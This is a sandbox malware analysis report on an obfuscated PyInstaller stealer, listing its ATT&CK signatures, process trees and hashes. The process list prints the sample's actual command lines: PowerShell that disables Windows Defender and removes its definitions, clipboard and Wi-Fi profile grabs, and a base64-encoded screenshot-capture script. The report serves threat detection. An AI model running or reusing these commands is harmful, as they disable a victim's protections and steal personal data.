Malware Analysis Report

2025-03-15 04:21

Sample ID 241025-3xz4fatngj
Target stub_obfuscated.exe
SHA256 efdc70eb1ee55fd5fd4a479bc4f602a9290b28659d0de57abe26c93c13714f21
Tags
pyinstaller collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

efdc70eb1ee55fd5fd4a479bc4f602a9290b28659d0de57abe26c93c13714f21

Threat Level: Likely malicious

The file stub_obfuscated.exe was found to be: Likely malicious.

Malicious Activity Summary

pyinstaller collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer

Command and Scripting Interpreter: PowerShell

Clipboard Data

Loads dropped DLL

Reads user/profile data of web browsers

Unsecured Credentials: Credentials In Files

Accesses cryptocurrency files/wallets, possible credential harvesting

Obfuscated Files or Information: Command Obfuscation

Looks up external IP address via web service

Enumerates processes with tasklist

Unsigned PE

Detects Pyinstaller

System Network Configuration Discovery: Wi-Fi Discovery

Browser Information Discovery

Event Triggered Execution: Netsh Helper DLL

Gathers system information

Suspicious use of AdjustPrivilegeToken

Detects videocard installed

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-25 23:54

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-25 23:54

Reported

2024-10-25 23:56

Platform

win7-20241023-en

Max time kernel

144s

Max time network

130s

Command Line

"C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Processes

C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe

"C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe"

C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe

"C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x3f4

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI23922\python310.dll

MD5 63a1fa9259a35eaeac04174cecb90048
SHA1 0dc0c91bcd6f69b80dcdd7e4020365dd7853885a
SHA256 14b06796f288bc6599e458fb23a944ab0c843e9868058f02a91d4606533505ed
SHA512 896caa053f48b1e4102e0f41a7d13d932a746eea69a894ae564ef5a84ef50890514deca6496e915aae40a500955220dbc1b1016fe0b8bcdde0ad81b2917dea8b

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-25 23:54

Reported

2024-10-25 23:56

Platform

win10v2004-20241007-en

Max time kernel

139s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe"

Signatures

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Browser Information Discovery

discovery

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4284 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe
PID 4284 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe
PID 4048 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 2020 wrote to memory of 404 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2020 wrote to memory of 404 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4572 wrote to memory of 1364 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4572 wrote to memory of 1364 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4048 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4840 wrote to memory of 2016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4840 wrote to memory of 2016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2332 wrote to memory of 1132 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2332 wrote to memory of 1132 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4048 wrote to memory of 3364 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 3364 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 3364 wrote to memory of 1620 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3364 wrote to memory of 1620 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1788 wrote to memory of 1612 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1788 wrote to memory of 1612 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4048 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 3776 wrote to memory of 2308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3776 wrote to memory of 2308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1744 wrote to memory of 708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 1744 wrote to memory of 708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 1516 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 1516 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 3188 wrote to memory of 4732 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3188 wrote to memory of 4732 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4076 wrote to memory of 2968 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4076 wrote to memory of 2968 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4048 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 872 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 872 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4048 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 3304 wrote to memory of 3372 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3304 wrote to memory of 3372 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4048 wrote to memory of 3332 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 3332 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 3332 wrote to memory of 1324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3332 wrote to memory of 1324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 2968 wrote to memory of 764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2968 wrote to memory of 764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4048 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 5000 wrote to memory of 404 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 5000 wrote to memory of 404 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com

Processes

C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe

"C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe"

C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe

"C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

